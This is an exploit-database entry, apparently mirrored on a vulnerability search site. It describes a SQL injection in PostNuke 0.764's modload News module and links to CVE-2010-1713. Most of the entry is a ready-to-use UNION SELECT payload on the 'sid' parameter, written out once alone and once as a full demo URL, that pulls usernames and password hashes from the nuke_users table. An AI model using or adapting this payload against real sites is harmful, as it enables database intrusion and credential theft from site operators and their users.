Lucene search
BILGE_KAGANEDB-ID:12410HistoryApr 26, 2010 - 12:00 a.m.
PostNuke 0.764 Module modload - SQL Injection
2010-04-2600:00:00
BILGE_KAGAN
www.exploit-db.com
22
AI Score
7.4
Confidence
Low
PostNuke 0.764 Module modload SQL Injection Vulnerability
###########################
Author : BILGE_KAGAN
Homepage : http://www.1923turk.com
Script : postnuke http://www.postnuke.com
Download : http://www.postnuke.com/module-Content-view-pid-2.html
###########################
[ Vulnerable File ]
modules.php?op=modload&name=News&file=article&sid=[ SQL ]
[ XpL ]
1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--
[ Demo]
http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--
Related
openvas
openvas
PostNuke modload Module 'sid' Parameter SQL Injection Vulnerability
2010-05-19 00:00:00
PostNuke modload Module 'sid' Parameter SQL Injection Vulnerability
2010-05-19 00:00:00
prion
prion
Sql injection
2010-05-04 16:00:00
cvelist
cvelist
CVE-2010-1713
2010-05-04 15:00:00
cve
cve
CVE-2010-1713
2010-05-04 16:00:35
nvd
nvd
CVE-2010-1713
2010-05-04 16:00:35